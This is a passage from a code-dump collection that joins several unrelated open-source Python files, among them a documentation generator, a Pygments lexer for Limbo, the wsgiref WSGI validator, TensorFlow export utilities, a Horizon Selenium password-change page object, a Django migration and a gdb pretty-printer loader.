if fname[-3:] == '.md':
fpath = os.path.join(subdir, fname)
new_fpath = fpath.replace('templates', 'sources')
shutil.copy(fpath, new_fpath)
# Take care of index page.
readme = open('../README.md').read()
index = open('templates/index.md').read()
index = index.replace('{{autogenerated}}', readme[readme.find('##'):])
f = open('sources/index.md', 'w')
f.write(index)
f.close()
print('Starting autogeneration.')
for page_data in PAGES:
blocks = []
classes = page_data.get('classes', [])
for module in page_data.get('all_module_classes', []):
module_classes = []
for name in dir(module):
if name[0] == '_' or name in EXCLUDE:
continue
module_member = getattr(module, name)
if inspect.isclass(module_member):
cls = module_member
if cls.__module__ == module.__name__:
if cls not in module_classes:
module_classes.append(cls)
module_classes.sort(key=lambda x: id(x))
classes += module_classes
for cls in classes:
subblocks = []
signature = get_class_signature(cls)
subblocks.append('<span style="float:right;">' +
class_to_source_link(cls) + '</span>')
subblocks.append('### ' + cls.__name__ + '\n')
subblocks.append(code_snippet(signature))
docstring = cls.__doc__
if docstring:
subblocks.append(process_docstring(docstring))
blocks.append('\n'.join(subblocks))
functions = page_data.get('functions', [])
for module in page_data.get('all_module_functions', []):
module_functions = []
for name in dir(module):
if name[0] == '_' or name in EXCLUDE:
continue
module_member = getattr(module, name)
if inspect.isfunction(module_member):
function = module_member
if module.__name__ in function.__module__:
if function not in module_functions:
module_functions.append(function)
module_functions.sort(key=lambda x: id(x))
functions += module_functions
for function in functions:
subblocks = []
signature = get_function_signature(function, method=False)
signature = signature.replace(function.__module__ + '.', '')
subblocks.append('### ' + function.__name__ + '\n')
subblocks.append(code_snippet(signature))
docstring = function.__doc__
if docstring:
subblocks.append(process_docstring(docstring))
blocks.append('\n\n'.join(subblocks))
if not blocks:
raise RuntimeError('Found no content for page ' +
page_data['page'])
mkdown = '\n----\n\n'.join(blocks)
# save module page.
# Either insert content into existing page,
# or create page otherwise
page_name = page_data['page']
path = os.path.join('sources', page_name)
if os.path.exists(path):
template = open(path).read()
assert '{{autogenerated}}' in template, ('Template found for ' + path +
' but missing {{autogenerated}} tag.')
mkdown = template.replace('{{autogenerated}}', mkdown)
print('...inserting autogenerated content into template:', path)
else:
print('...creating new page with autogenerated content:', path)
subdir = os.path.dirname(path)
if not os.path.exists(subdir):
os.makedirs(subdir)
open(path, 'w').write(mkdown)
# shutil.copyfile('../CONTRIBUTING.md', 'sources/contributing.md')
# © 2018 GitHub, Inc.
# Terms
# Privacy
|
brianzelip/militarization | refs/heads/gh-pages | css/basscss/node_modules/pygmentize-bundled/vendor/pygments/pygments/lexers/inferno.py | 52 | # -*- coding: utf-8 -*-
"""
pygments.lexers.inferno
~~~~~~~~~~~~~~~~~~~~~~~
Lexers for Inferno os and all the related stuff.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups
from pygments.token import Punctuation, Text, Comment, Operator, Keyword, \
Name, String, Number
__all__ = ['LimboLexer']
class LimboLexer(RegexLexer):
"""
Lexer for `Limbo programming language <http://www.vitanuova.com/inferno/limbo.html>`_
TODO:
- maybe implement better var declaration highlighting
- some simple syntax error highlighting
.. versionadded:: 2.0
"""
name = 'Limbo'
aliases = ['limbo']
filenames = ['*.b']
mimetypes = ['text/limbo']
tokens = {
'whitespace': [
(r'^(\s*)([a-zA-Z_]\w*:(\s*)\n)',
bygroups(Text, Name.Label)),
(r'\n', Text),
(r'\s+', Text),
(r'#(\n|(.|\n)*?[^\\]\n)', Comment.Single),
],
'string': [
(r'"', String, '#pop'),
(r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|'
r'u[a-fA-F0-9]{4}|U[a-fA-F0-9]{8}|[0-7]{1,3})', String.Escape),
(r'[^\\"\n]+', String), # all other characters
(r'\\', String), # stray backslash
],
'statements': [
(r'"', String, 'string'),
(r"'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", String.Char),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])', Number.Float),
(r'16r[0-9a-fA-F]+', Number.Hex),
(r'8r[0-7]+', Number.Oct),
(r'((([1-3]\d)|([2-9]))r)?(\d+)', Number.Integer),
(r'[()\[\],.]', Punctuation),
(r'[~!%^&*+=|?:<>/-]|(->)|(<-)|(=>)|(::)', Operator),
(r'(alt|break|case|continue|cyclic|do|else|exit'
r'for|hd|if|implement|import|include|len|load|or'
r'pick|return|spawn|tagof|tl|to|while)\b', Keyword),
(r'(byte|int|big|real|string|array|chan|list|adt'
r'|fn|ref|of|module|self|type)\b', Keyword.Type),
(r'(con|iota|nil)\b', Keyword.Constant),
('[a-zA-Z_]\w*', Name),
],
'statement' : [
include('whitespace'),
include('statements'),
('[{}]', Punctuation),
(';', Punctuation, '#pop'),
],
'root': [
include('whitespace'),
('', Text, 'statement'),
],
}
def analyse_text(text):
# Any limbo module implements something
if re.search(r'^implement \w+;', text, re.MULTILINE):
return 0.7
# TODO:
# - Make lexers for:
# - asm sources
# - man pages
# - mkfiles
# - module definitions
# - namespace definitions
# - shell scripts
# - maybe keyfiles and fonts
# they all seem to be quite similar to their equivalents
# from unix world, so there should not be a lot of problems
|
TathagataChakraborti/resource-conflicts | refs/heads/master | PLANROB-2015/seq-sat-lama/py2.5/lib/python2.5/wsgiref/validate.py | 162 | # (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Also licenced under the Apache License, 2.0: http://opensource.org/licenses/apache2.0.php
# Licensed to PSF under a Contributor Agreement
"""
Middleware to check for obedience to the WSGI specification.
Some of the things this checks:
* Signature of the application and start_response (including that
keyword arguments are not used).
* Environment checks:
- Environment is a dictionary (and not a subclass).
- That all the required keys are in the environment: REQUEST_METHOD,
SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors,
wsgi.multithread, wsgi.multiprocess, wsgi.run_once
- That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the
environment (these headers should appear as CONTENT_LENGTH and
CONTENT_TYPE).
- Warns if QUERY_STRING is missing, as the cgi module acts
unpredictably in that case.
- That CGI-style variables (that don't contain a .) have
(non-unicode) string values
- That wsgi.version is a tuple
- That wsgi.url_scheme is 'http' or 'https' (@@: is this too
restrictive?)
- Warns if the REQUEST_METHOD is not known (@@: probably too
restrictive).
- That SCRIPT_NAME and PATH_INFO are empty or start with /
- That at least one of SCRIPT_NAME or PATH_INFO are set.
- That CONTENT_LENGTH is a positive integer.
- That SCRIPT_NAME is not '/' (it should be '', and PATH_INFO should
be '/').
- That wsgi.input has the methods read, readline, readlines, and
__iter__
- That wsgi.errors has the methods flush, write, writelines
* The status is a string, contains a space, starts with an integer,
and that integer is in range (> 100).
* That the headers is a list (not a subclass, not another kind of
sequence).
* That the items of the headers are tuples of strings.
* That there is no 'status' header (that is used in CGI, but not in
WSGI).
* That the headers don't contain newlines or colons, end in _ or -, or
contain characters codes below 037.
* That Content-Type is given if there is content (CGI often has a
default content type, but WSGI does not).
* That no Content-Type is given when there is no content (@@: is this
too restrictive?)
* That the exc_info argument to start_response is a tuple or None.
* That all calls to the writer are with strings, and no other methods
on the writer are accessed.
* That wsgi.input is used properly:
- .read() is called with zero or one argument
- That it returns a string
- That readline, readlines, and __iter__ return strings
- That .close() is not called
- No other methods are provided
* That wsgi.errors is used properly:
- .write() and .writelines() is called with a string
- That .close() is not called, and no other methods are provided.
* The response iterator:
- That it is not a string (it should be a list of a single string; a
string will work, but perform horribly).
- That .next() returns a string
- That the iterator is not iterated over until start_response has
been called (that can signal either a server or application
error).
- That .close() is called (doesn't raise exception, only prints to
sys.stderr, because we only know it isn't called when the object
is garbage collected).
"""
__all__ = ['validator']
import re
import sys
from types import DictType, StringType, TupleType, ListType
import warnings
header_re = re.compile(r'^[a-zA-Z][a-zA-Z0-9\-_]*$')
bad_header_value_re = re.compile(r'[\000-\037]')
class WSGIWarning(Warning):
"""
Raised in response to WSGI-spec-related warnings
"""
def assert_(cond, *args):
if not cond:
raise AssertionError(*args)
def validator(application):
"""
When applied between a WSGI server and a WSGI application, this
middleware will check for WSGI compliancy on a number of levels.
This middleware does not modify the request or response in any
way, but will throw an AssertionError if anything seems off
(except for a failure to close the application iterator, which
will be printed to stderr -- there's no way to throw an exception
at that point).
"""
def lint_app(*args, **kw):
assert_(len(args) == 2, "Two arguments required")
assert_(not kw, "No keyword arguments allowed")
environ, start_response = args
check_environ(environ)
# We use this to check if the application returns without
# calling start_response:
start_response_started = []
def start_response_wrapper(*args, **kw):
assert_(len(args) == 2 or len(args) == 3, (
"Invalid number of arguments: %s" % (args,)))
assert_(not kw, "No keyword arguments allowed")
status = args[0]
headers = args[1]
if len(args) == 3:
exc_info = args[2]
else:
exc_info = None
check_status(status)
check_headers(headers)
check_content_type(status, headers)
check_exc_info(exc_info)
start_response_started.append(None)
return WriteWrapper(start_response(*args))
environ['wsgi.input'] = InputWrapper(environ['wsgi.input'])
environ['wsgi.errors'] = ErrorWrapper(environ['wsgi.errors'])
iterator = application(environ, start_response_wrapper)
assert_(iterator is not None and iterator != False,
"The application must return an iterator, if only an empty list")
check_iterator(iterator)
return IteratorWrapper(iterator, start_response_started)
return lint_app
class InputWrapper:
def __init__(self, wsgi_input):
self.input = wsgi_input
def read(self, *args):
assert_(len(args) <= 1)
v = self.input.read(*args)
assert_(type(v) is type(""))
return v
def readline(self):
v = self.input.readline()
assert_(type(v) is type(""))
return v
def readlines(self, *args):
assert_(len(args) <= 1)
lines = self.input.readlines(*args)
assert_(type(lines) is type([]))
for line in lines:
assert_(type(line) is type(""))
return lines
def __iter__(self):
while 1:
line = self.readline()
if not line:
return
yield line
def close(self):
assert_(0, "input.close() must not be called")
class ErrorWrapper:
def __init__(self, wsgi_errors):
self.errors = wsgi_errors
def write(self, s):
assert_(type(s) is type(""))
self.errors.write(s)
def flush(self):
self.errors.flush()
def writelines(self, seq):
for line in seq:
self.write(line)
def close(self):
assert_(0, "errors.close() must not be called")
class WriteWrapper:
def __init__(self, wsgi_writer):
self.writer = wsgi_writer
def __call__(self, s):
assert_(type(s) is type(""))
self.writer(s)
class PartialIteratorWrapper:
def __init__(self, wsgi_iterator):
self.iterator = wsgi_iterator
def __iter__(self):
# We want to make sure __iter__ is called
return IteratorWrapper(self.iterator, None)
class IteratorWrapper:
def __init__(self, wsgi_iterator, check_start_response):
self.original_iterator = wsgi_iterator
self.iterator = iter(wsgi_iterator)
self.closed = False
self.check_start_response = check_start_response
def __iter__(self):
return self
def next(self):
assert_(not self.closed,
"Iterator read after closed")
v = self.iterator.next()
if self.check_start_response is not None:
assert_(self.check_start_response,
"The application returns and we started iterating over its body, but start_response has not yet been called")
self.check_start_response = None
return v
def close(self):
self.closed = True
if hasattr(self.original_iterator, 'close'):
self.original_iterator.close()
def __del__(self):
if not self.closed:
sys.stderr.write(
"Iterator garbage collected without being closed")
assert_(self.closed,
"Iterator garbage collected without being closed")
def check_environ(environ):
assert_(type(environ) is DictType,
"Environment is not of the right type: %r (environment: %r)"
% (type(environ), environ))
for key in ['REQUEST_METHOD', 'SERVER_NAME', 'SERVER_PORT',
'wsgi.version', 'wsgi.input', 'wsgi.errors',
'wsgi.multithread', 'wsgi.multiprocess',
'wsgi.run_once']:
assert_(key in environ,
"Environment missing required key: %r" % (key,))
for key in ['HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH']:
assert_(key not in environ,
"Environment should not have the key: %s "
"(use %s instead)" % (key, key[5:]))
if 'QUERY_STRING' not in environ:
warnings.warn(
'QUERY_STRING is not in the WSGI environment; the cgi '
'module will use sys.argv when this variable is missing, '
'so application errors are more likely',
WSGIWarning)
for key in environ.keys():
if '.' in key:
# Extension, we don't care about its type
continue
assert_(type(environ[key]) is StringType,
"Environmental variable %s is not a string: %r (value: %r)"
% (key, type(environ[key]), environ[key]))
assert_(type(environ['wsgi.version']) is TupleType,
"wsgi.version should be a tuple (%r)" % (environ['wsgi.version'],))
assert_(environ['wsgi.url_scheme'] in ('http', 'https'),
"wsgi.url_scheme unknown: %r" % environ['wsgi.url_scheme'])
check_input(environ['wsgi.input'])
check_errors(environ['wsgi.errors'])
# @@: these need filling out:
if environ['REQUEST_METHOD'] not in (
'GET', 'HEAD', 'POST', 'OPTIONS','PUT','DELETE','TRACE'):
warnings.warn(
"Unknown REQUEST_METHOD: %r" % environ['REQUEST_METHOD'],
WSGIWarning)
assert_(not environ.get('SCRIPT_NAME')
or environ['SCRIPT_NAME'].startswith('/'),
"SCRIPT_NAME doesn't start with /: %r" % environ['SCRIPT_NAME'])
assert_(not environ.get('PATH_INFO')
or environ['PATH_INFO'].startswith('/'),
"PATH_INFO doesn't start with /: %r" % environ['PATH_INFO'])
if environ.get('CONTENT_LENGTH'):
assert_(int(environ['CONTENT_LENGTH']) >= 0,
"Invalid CONTENT_LENGTH: %r" % environ['CONTENT_LENGTH'])
if not environ.get('SCRIPT_NAME'):
assert_(environ.has_key('PATH_INFO'),
"One of SCRIPT_NAME or PATH_INFO are required (PATH_INFO "
"should at least be '/' if SCRIPT_NAME is empty)")
assert_(environ.get('SCRIPT_NAME') != '/',
"SCRIPT_NAME cannot be '/'; it should instead be '', and "
"PATH_INFO should be '/'")
def check_input(wsgi_input):
for attr in ['read', 'readline', 'readlines', '__iter__']:
assert_(hasattr(wsgi_input, attr),
"wsgi.input (%r) doesn't have the attribute %s"
% (wsgi_input, attr))
def check_errors(wsgi_errors):
for attr in ['flush', 'write', 'writelines']:
assert_(hasattr(wsgi_errors, attr),
"wsgi.errors (%r) doesn't have the attribute %s"
% (wsgi_errors, attr))
def check_status(status):
assert_(type(status) is StringType,
"Status must be a string (not %r)" % status)
# Implicitly check that we can turn it into an integer:
status_code = status.split(None, 1)[0]
assert_(len(status_code) == 3,
"Status codes must be three characters: %r" % status_code)
status_int = int(status_code)
assert_(status_int >= 100, "Status code is invalid: %r" % status_int)
if len(status) < 4 or status[3] != ' ':
warnings.warn(
"The status string (%r) should be a three-digit integer "
"followed by a single space and a status explanation"
% status, WSGIWarning)
def check_headers(headers):
assert_(type(headers) is ListType,
"Headers (%r) must be of type list: %r"
% (headers, type(headers)))
header_names = {}
for item in headers:
assert_(type(item) is TupleType,
"Individual headers (%r) must be of type tuple: %r"
% (item, type(item)))
assert_(len(item) == 2)
name, value = item
assert_(name.lower() != 'status',
"The Status header cannot be used; it conflicts with CGI "
"script, and HTTP status is not given through headers "
"(value: %r)." % value)
header_names[name.lower()] = None
assert_('\n' not in name and ':' not in name,
"Header names may not contain ':' or '\\n': %r" % name)
assert_(header_re.search(name), "Bad header name: %r" % name)
assert_(not name.endswith('-') and not name.endswith('_'),
"Names may not end in '-' or '_': %r" % name)
if bad_header_value_re.search(value):
assert_(0, "Bad header value: %r (bad char: %r)"
% (value, bad_header_value_re.search(value).group(0)))
def check_content_type(status, headers):
code = int(status.split(None, 1)[0])
# @@: need one more person to verify this interpretation of RFC 2616
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
NO_MESSAGE_BODY = (204, 304)
for name, value in headers:
if name.lower() == 'content-type':
if code not in NO_MESSAGE_BODY:
return
assert_(0, ("Content-Type header found in a %s response, "
"which must not return content.") % code)
if code not in NO_MESSAGE_BODY:
assert_(0, "No Content-Type header found in headers (%s)" % headers)
def check_exc_info(exc_info):
assert_(exc_info is None or type(exc_info) is type(()),
"exc_info (%r) is not a tuple: %r" % (exc_info, type(exc_info)))
# More exc_info checks?
def check_iterator(iterator):
# Technically a string is legal, which is why it's a really bad
# idea, because it may cause the response to be returned
# character-by-character
assert_(not isinstance(iterator, str),
"You should not return a string as your application iterator, "
"instead return a single-item list containing that string.")
|
ville-k/tensorflow | refs/heads/master | tensorflow/contrib/learn/python/learn/utils/export.py | 48 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Export utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.framework import deprecated
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.session_bundle import exporter
from tensorflow.contrib.session_bundle import gc
from tensorflow.python.client import session as tf_session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import saver as tf_saver
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _get_first_op_from_collection(collection_name):
"""Get first element from the collection."""
elements = ops.get_collection(collection_name)
if elements is not None:
if elements:
return elements[0]
return None
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _get_saver():
"""Lazy init and return saver."""
saver = _get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is not None:
if saver:
saver = saver[0]
else:
saver = None
if saver is None and variables.global_variables():
saver = tf_saver.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
return saver
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _export_graph(graph, saver, checkpoint_path, export_dir,
default_graph_signature, named_graph_signatures,
exports_to_keep):
"""Exports graph via session_bundle, by creating a Session."""
with graph.as_default():
with tf_session.Session('') as session:
variables.local_variables_initializer()
lookup_ops.tables_initializer()
saver.restore(session, checkpoint_path)
export = exporter.Exporter(saver)
export.init(
init_op=control_flow_ops.group(
variables.local_variables_initializer(),
lookup_ops.tables_initializer()),
default_graph_signature=default_graph_signature,
named_graph_signatures=named_graph_signatures,
assets_collection=ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS))
return export.export(export_dir, contrib_variables.get_global_step(),
session, exports_to_keep=exports_to_keep)
@deprecated('2017-03-25',
'signature_fns are deprecated. For canned Estimators they are no '
'longer needed. For custom Estimators, please return '
'output_alternatives from your model_fn via ModelFnOps.')
def generic_signature_fn(examples, unused_features, predictions):
"""Creates generic signature from given examples and predictions.
This is needed for backward compatibility with default behavior of
export_estimator.
Args:
examples: `Tensor`.
unused_features: `dict` of `Tensor`s.
predictions: `Tensor` or `dict` of `Tensor`s.
Returns:
Tuple of default signature and empty named signatures.
Raises:
ValueError: If examples is `None`.
"""
if examples is None:
raise ValueError('examples cannot be None when using this signature fn.')
tensors = {'inputs': examples}
if not isinstance(predictions, dict):
predictions = {'outputs': predictions}
tensors.update(predictions)
default_signature = exporter.generic_signature(tensors)
return default_signature, {}
@deprecated('2017-03-25',
'signature_fns are deprecated. For canned Estimators they are no '
'longer needed. For custom Estimators, please return '
'output_alternatives from your model_fn via ModelFnOps.')
def classification_signature_fn(examples, unused_features, predictions):
"""Creates classification signature from given examples and predictions.
Args:
examples: `Tensor`.
unused_features: `dict` of `Tensor`s.
predictions: `Tensor` or dict of tensors that contains the classes tensor
as in {'classes': `Tensor`}.
Returns:
Tuple of default classification signature and empty named signatures.
Raises:
ValueError: If examples is `None`.
"""
if examples is None:
raise ValueError('examples cannot be None when using this signature fn.')
if isinstance(predictions, dict):
default_signature = exporter.classification_signature(
examples, classes_tensor=predictions['classes'])
else:
default_signature = exporter.classification_signature(
examples, classes_tensor=predictions)
return default_signature, {}
@deprecated('2017-03-25',
'signature_fns are deprecated. For canned Estimators they are no '
'longer needed. For custom Estimators, please return '
'output_alternatives from your model_fn via ModelFnOps.')
def classification_signature_fn_with_prob(
examples, unused_features, predictions):
"""Classification signature from given examples and predicted probabilities.
Args:
examples: `Tensor`.
unused_features: `dict` of `Tensor`s.
predictions: `Tensor` of predicted probabilities or dict that contains the
probabilities tensor as in {'probabilities', `Tensor`}.
Returns:
Tuple of default classification signature and empty named signatures.
Raises:
ValueError: If examples is `None`.
"""
if examples is None:
raise ValueError('examples cannot be None when using this signature fn.')
if isinstance(predictions, dict):
default_signature = exporter.classification_signature(
examples, scores_tensor=predictions['probabilities'])
else:
default_signature = exporter.classification_signature(
examples, scores_tensor=predictions)
return default_signature, {}
@deprecated('2017-03-25',
'signature_fns are deprecated. For canned Estimators they are no '
'longer needed. For custom Estimators, please return '
'output_alternatives from your model_fn via ModelFnOps.')
def regression_signature_fn(examples, unused_features, predictions):
"""Creates regression signature from given examples and predictions.
Args:
examples: `Tensor`.
unused_features: `dict` of `Tensor`s.
predictions: `Tensor`.
Returns:
Tuple of default regression signature and empty named signatures.
Raises:
ValueError: If examples is `None`.
"""
if examples is None:
raise ValueError('examples cannot be None when using this signature fn.')
default_signature = exporter.regression_signature(
input_tensor=examples, output_tensor=predictions)
return default_signature, {}
@deprecated('2017-03-25',
'signature_fns are deprecated. For canned Estimators they are no '
'longer needed. For custom Estimators, please return '
'output_alternatives from your model_fn via ModelFnOps.')
def logistic_regression_signature_fn(examples, unused_features, predictions):
"""Creates logistic regression signature from given examples and predictions.
Args:
examples: `Tensor`.
unused_features: `dict` of `Tensor`s.
predictions: `Tensor` of shape [batch_size, 2] of predicted probabilities or
dict that contains the probabilities tensor as in
{'probabilities', `Tensor`}.
Returns:
Tuple of default regression signature and named signature.
Raises:
ValueError: If examples is `None`.
"""
if examples is None:
raise ValueError('examples cannot be None when using this signature fn.')
if isinstance(predictions, dict):
predictions_tensor = predictions['probabilities']
else:
predictions_tensor = predictions
# predictions should have shape [batch_size, 2] where first column is P(Y=0|x)
# while second column is P(Y=1|x). We are only interested in the second
# column for inference.
predictions_shape = predictions_tensor.get_shape()
predictions_rank = len(predictions_shape)
if predictions_rank != 2:
logging.fatal(
'Expected predictions to have rank 2, but received predictions with '
'rank: {} and shape: {}'.format(predictions_rank, predictions_shape))
if predictions_shape[1] != 2:
logging.fatal(
'Expected predictions to have 2nd dimension: 2, but received '
'predictions with 2nd dimension: {} and shape: {}. Did you mean to use '
'regression_signature_fn or classification_signature_fn_with_prob '
'instead?'.format(predictions_shape[1], predictions_shape))
positive_predictions = predictions_tensor[:, 1]
default_signature = exporter.regression_signature(
input_tensor=examples, output_tensor=positive_predictions)
return default_signature, {}
# pylint: disable=protected-access
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _default_input_fn(estimator, examples):
"""Creates default input parsing using Estimator's feature signatures."""
return estimator._get_feature_ops_from_example(examples)
@deprecated('2016-09-23', 'Please use Estimator.export_savedmodel() instead.')
def export_estimator(estimator,
export_dir,
signature_fn=None,
input_fn=_default_input_fn,
default_batch_size=1,
exports_to_keep=None):
"""Deprecated, please use Estimator.export_savedmodel()."""
_export_estimator(estimator=estimator,
export_dir=export_dir,
signature_fn=signature_fn,
input_fn=input_fn,
default_batch_size=default_batch_size,
exports_to_keep=exports_to_keep)
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _export_estimator(estimator,
export_dir,
signature_fn,
input_fn,
default_batch_size,
exports_to_keep,
input_feature_key=None,
use_deprecated_input_fn=True,
prediction_key=None,
checkpoint_path=None):
if use_deprecated_input_fn:
input_fn = input_fn or _default_input_fn
elif input_fn is None:
raise ValueError('input_fn must be defined.')
# If checkpoint_path is specified, use the specified checkpoint path.
checkpoint_path = (checkpoint_path or
tf_saver.latest_checkpoint(estimator._model_dir))
with ops.Graph().as_default() as g:
contrib_variables.create_global_step(g)
if use_deprecated_input_fn:
examples = array_ops.placeholder(dtype=dtypes.string,
shape=[default_batch_size],
name='input_example_tensor')
features = input_fn(estimator, examples)
else:
features, _ = input_fn()
examples = None
if input_feature_key is not None:
examples = features.pop(input_feature_key)
if (not features) and (examples is None):
raise ValueError('Either features or examples must be defined.')
predictions = estimator._get_predict_ops(features).predictions
if prediction_key is not None:
predictions = predictions[prediction_key]
# Explicit signature_fn takes priority
if signature_fn:
default_signature, named_graph_signatures = signature_fn(examples,
features,
predictions)
else:
try:
# Some estimators provide a signature function.
# TODO(zakaria): check if the estimator has this function,
# raise helpful error if not
signature_fn = estimator._create_signature_fn()
default_signature, named_graph_signatures = (
signature_fn(examples, features, predictions))
except AttributeError:
logging.warn(
'Change warning: `signature_fn` will be required after'
'2016-08-01.\n'
'Using generic signatures for now. To maintain this behavior, '
'pass:\n'
' signature_fn=export.generic_signature_fn\n'
'Also consider passing a regression or classification signature; '
'see cl/126430915 for an example.')
default_signature, named_graph_signatures = generic_signature_fn(
examples, features, predictions)
if exports_to_keep is not None:
exports_to_keep = gc.largest_export_versions(exports_to_keep)
return _export_graph(
g,
_get_saver(),
checkpoint_path,
export_dir,
default_graph_signature=default_signature,
named_graph_signatures=named_graph_signatures,
exports_to_keep=exports_to_keep)
# pylint: enable=protected-access
|
394954369/horizon | refs/heads/master | openstack_dashboard/test/integration_tests/pages/changepasswordpage.py | 13 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.pages import pageobject
class ChangePasswordPage(basepage.BasePage):
@property
def modal(self):
return ChangePasswordPage.ChangePasswordModal(self.driver,
self.conf)
def change_password(self, current, new):
self.fill_field_element(
current, self.modal.current_password)
self.fill_field_element(
new, self.modal.new_password)
self.fill_field_element(
new, self.modal.confirm_new_password)
self.modal.click_on_change_button()
def reset_to_default_password(self, current):
if self.topbar.user.text == self.conf.identity.admin_username:
return self.change_password(current,
self.conf.identity.admin_password)
else:
return self.change_password(current,
self.conf.identity.password)
class ChangePasswordModal(pageobject.PageObject):
_current_password_locator = (by.By.CSS_SELECTOR,
'input#id_current_password')
_new_password_locator = (by.By.CSS_SELECTOR,
'input#id_new_password')
_confirm_new_password_locator = (by.By.CSS_SELECTOR,
'input#id_confirm_password')
_change_submit_button_locator = (by.By.CSS_SELECTOR,
'div.modal-footer button.btn')
@property
def current_password(self):
return self.get_element(*self._current_password_locator)
@property
def new_password(self):
return self.get_element(*self._new_password_locator)
@property
def confirm_new_password(self):
return self.get_element(*self._confirm_new_password_locator)
@property
def change_button(self):
return self.get_element(*self._change_submit_button_locator)
def click_on_change_button(self):
self.change_button.click()
|
mglukhikh/intellij-community | refs/heads/master | python/testData/psi/BlockWithoutColon.py | 80 | def foo():
while True
x = 1
x = 2
return x
|
BehavioralInsightsTeam/edx-platform | refs/heads/release-bit | openedx/core/djangoapps/content/course_overviews/migrations/0005_delete_courseoverviewgeneratedhistory.py | 80 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('course_overviews', '0004_courseoverview_org'),
]
operations = [
migrations.DeleteModel(
name='CourseOverviewGeneratedHistory',
),
]
|
mihail-morosan/OCAPE | refs/heads/master | Utils/gcc/lib/gcc/mingw32/4.8.1/libstdc++.dll.a-gdb.py | 8 | # -*- python -*-
# Copyright (C) 2009-2013 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/mingw/share/gcc-4.8.1/python'
libdir = '/mingw/lib/gcc/mingw32/4.8.1'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Load the pretty-printers.
from libstdcxx.v6.printers import register_libstdcxx_printers
register_libstdcxx_printers (gdb.current_objfile ())
|
cytec/SickRage | refs/heads/master | lib/pysrt/srtitem.py | 73 | # -*- coding: utf-8 -*-
"""
SubRip's subtitle parser
"""
from pysrt.srtexc import InvalidItem, InvalidIndex
from pysrt.srttime import SubRipTime
from pysrt.comparablemixin import ComparableMixin
from pysrt.compat import str, is_py2
import re
class SubRipItem(ComparableMixin):
"""
SubRipItem(index, start, end, text, position)
index -> int: index of item in file. 0 by default.
start, end -> SubRipTime or coercible.
text -> unicode: text content for item.
position -> unicode: raw srt/vtt "display coordinates" string
"""
ITEM_PATTERN = str('%s\n%s --> %s%s\n%s\n')
